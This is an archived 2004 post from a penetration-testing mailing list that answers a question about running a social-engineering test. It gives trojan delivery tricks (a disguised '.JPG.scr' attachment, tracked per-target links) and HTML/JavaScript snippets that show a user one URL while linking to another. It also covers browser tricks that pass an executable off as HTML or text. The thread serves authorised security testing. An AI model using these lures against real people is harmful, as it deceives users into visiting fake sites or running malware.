Penetration Testing mailing list archives

Re: Social Engineering Website (URL obfuscation/hiding)

From: Martin Mačok <martin.macok () underground cz>
Date: Sat, 10 Jan 2004 08:59:16 +0100

On Fri, Jan 09, 2004 at 06:32:48AM -0800, Random Task wrote:

As a last note, we'd need to get people to go there. Making it look
legit would be good. (i.e. use the %00 IE exploit to make the URL
look like it's internal and make the site look like their own) Any
techniques or message styles you've used and had success with?


 - send the trojan code in an email attachment with a good old
   something.JPG.scr trick (if you can go to them, they don't have to
   go to you)
   - some content filters disallow .scr, so try .lnk also
 - send a link to the trojan file, in typical MS Outlook environment,
   they just have to click on it and select "Open"
   - use unique URL/file for each target (so you can track downloads
     and email forwards)

URL obfuscation/hiding:

        <script language="JavaScript">
        <!--
        function changehref()
        {
           document.all("obj").href = "http://www.fakesite.com"; ;
           return 1 ;
        }
        //-->
        </script>

        [snip]

        <a href="http://www.realsite.com/"; id="obj"
        onclick="changehref();">www.fakesite.com</a>

Similar trick:

        <a href="http://www.realsite.com";
        onmouseover="window.status=('http://www.fakesite.com/&apos;); return
        true;">www.fakesite.com</a>

Some more recent SCAM trick:

        <a
        href="http://www.fakesite.com:something_ugly_long () www realsite com/">
        www.fakesite.com</a>

Other MS IE trick (browser believes it's a HTML instead of EXE):
        
        http://server/file.exe?.html

As you mention, MS IE's (and possibly some other browser's) %00 trick:
     
        README.TXT%00PROG.EXE in Content-disposition:
        (there are many different tricks with %00)

See also:
http://www.infohacking.com/INFOHACKING_RESEARCH/Our_Advisories/IE/index.html
http://www.solutions.fi/iebug2

-- 
         Martin Mačok                 http://underground.cz/
   martin.macok () underground cz        http://Xtrmntr.org/ORBman/

---------------------------------------------------------------------------
----------------------------------------------------------------------------

Current thread:

Social Engineering Website Random Task (Jan 09)
- Re: Social Engineering Website (and Trojan test) Martin Mačok (Jan 12)
- Converting raw 802.11 (rfmon) capture file to standard libpcap Jerry Shenk (Jan 12)
  - Re: Converting raw 802.11 (rfmon) capture file to standard libpcap James Golovich (Jan 12)
    - RE: Converting raw 802.11 (rfmon) capture file to standard libpcap Jerry Shenk (Jan 12)
    - Re: Converting raw 802.11 (rfmon) capture file to standard libpcap Aaron Turner (Jan 13)
  - RE: Converting raw 802.11 (rfmon) capture file to standard libpcap Chris Eagle (Jan 12)
- Re: Social Engineering Website (URL obfuscation/hiding) Martin Mačok (Jan 12)
- Re: Social Engineering Website Nicolas Gregoire (Jan 13)
- <Possible follow-ups>
- RE: Social Engineering Website Otero, Hernan (EDS) (Jan 12)